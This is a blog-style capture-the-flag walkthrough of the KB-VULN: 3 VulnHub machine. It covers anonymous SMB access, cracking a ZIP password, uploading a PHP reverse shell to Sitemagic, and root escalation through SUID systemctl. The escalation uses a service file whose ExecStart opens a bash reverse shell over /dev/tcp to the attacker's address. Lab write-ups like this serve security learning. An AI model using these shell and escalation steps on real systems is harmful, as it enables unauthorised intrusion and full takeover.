Introduction

This machine is the kind that will measure your research ability. This VM is running on VirtualBox. It includes 2 flags:user.txt and root.txt.

This is KB-VULN: 3 from vulnhub. After doing Tenderfoot I rolled straight into this one and knocked it over too.

Ports

This box has:

  1. 22/tcp open ssh
  2. 80/tcp open http
  3. 139/tcp open netbios-ssn
  4. 445/tcp open microsoft-ds

So, SSH, HTTP and SMB; gotcha.

SMB

We have anonymous login to SMB; I used nautilus. I’ve been liking it lately.

In the share we find website.zip which has a password protected note file in it. No problem:

root@kali:/opt/vulnhub/kbvuln3# john website.john -w=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman         (website.zip)
1g 0:00:00:00 DONE (2020-10-26 07:49) 1.612g/s 7372Kp/s 7372Kc/s 7372KC/s porkedmark21..pop1937
Use the "--show" option to display all of the cracked passwords reliably
Session completed

What’s the contents?

Hi Heisenberg! Your website is activated. –> kb.vuln
Username : admin
Password : jesse
Have a good day !

So we have some credentials. Let’s check out the website. Also I added kb.vuln to /etc/hosts, but it probably wasn’t necessary.

Website

The website is running Sitemagic, same as Cewlkid: 1. So we have arbitrary PHP file upload. I use the GUI to upload a shell and find it at:

http://kb.vuln/files/rev-plugin.php

Note: the file is called plugin because I originally used it for a Wordpress thing. It’s nothing special, just a bash reverse shell.

I catch the shell in a listener and we’re away.

Privesc

We’ve only got one prominent user (heisenberg) and they’re in the sudo group so we’re probably going there or direct to root. Linpeas says systemctl has the SUID bit set; so that’s our method.

GTFOBins has a technique, but it fails. Hmmm. I try a slightly different custom service, but get an error:

Failed to lookup unit file state: Invalid argument

There doesn’t appear to be anything wrong with the service file, but the system isn’t happy. After some trawling through stackoverflow and other places, I visit /etc/systemd/system/multi-user.target.wants and find a broken symlink:

0 lrwxrwxrwx 1 root root 29 Oct 2 18:53 root.service -> /home/heisenberg/root.service

The /home/heisenberg/root.service file does not exist. I can’t remove it with rm; I don’t have permission. However:

www-data@kb-server:/etc/systemd/system/multi-user.target.wants$ systemctl disable root.service
<i-user.target.wants$ systemctl disable root.service            
Removed /etc/systemd/system/multi-user.target.wants/root.service.
Removed /etc/systemd/system/root.service.

This got rid of the problem. On to root!

My service looked like this:

root@kali:/opt/vulnhub/kbvuln3# cat toor.service 
[Unit]
Description=Whatever

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.77/1235 0>&1"

[Install]
WantedBy=multi-user.target

And it was located in /dev/shm. With the broken symlink out of the way:

www-data@kb-server:/etc/systemd/system/multi-user.target.wants$ systemctl enable /dev/shm/toor.service
<arget.wants$ systemctl enable /dev/shm/toor.service            
Created symlink /etc/systemd/system/multi-user.target.wants/toor.service -> /dev/shm/toor.service.
Created symlink /etc/systemd/system/toor.service -> /dev/shm/toor.service.
www-data@kb-server:/etc/systemd/system/multi-user.target.wants$ systemctl start toor
<ystem/multi-user.target.wants$ systemctl start toor            
www-data@kb-server:/etc/systemd/system/multi-user.target.wants$

And in my listener:

root@kali:/opt/vulnhub/kbvuln3# nc -nvlp 1235
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1235
Ncat: Listening on 0.0.0.0:1235
Ncat: Connection from 192.168.1.127.
Ncat: Connection from 192.168.1.127:38988.
bash: cannot set terminal process group (5763): Inappropriate ioctl for device
bash: no job control in this shell
root@kb-server:/# whoami
whoami
root
root@kb-server:/# cd /root
cd /root
root@kb-server:~# ls -lash
ls -lash
total 36K
4.0K drwx------  4 root root 4.0K Oct  2 18:12 .
4.0K drwxr-xr-x 24 root root 4.0K Oct 26 08:53 ..
4.0K -rw-------  1 root root   38 Oct  2 18:54 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Oct  2 16:33 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root 1.1K Oct  2 15:55 root.txt
4.0K drwx------  2 root root 4.0K Oct  2 16:18 .ssh
4.0K -rw-------  1 root root  873 Oct  2 16:40 .viminfo
root@kb-server:~# cat root.txt
cat root.txt
                         
ASCII Art removed
kernelblog.org    
49360ba4cbe27a1b900df25b247315d7

Neato completo.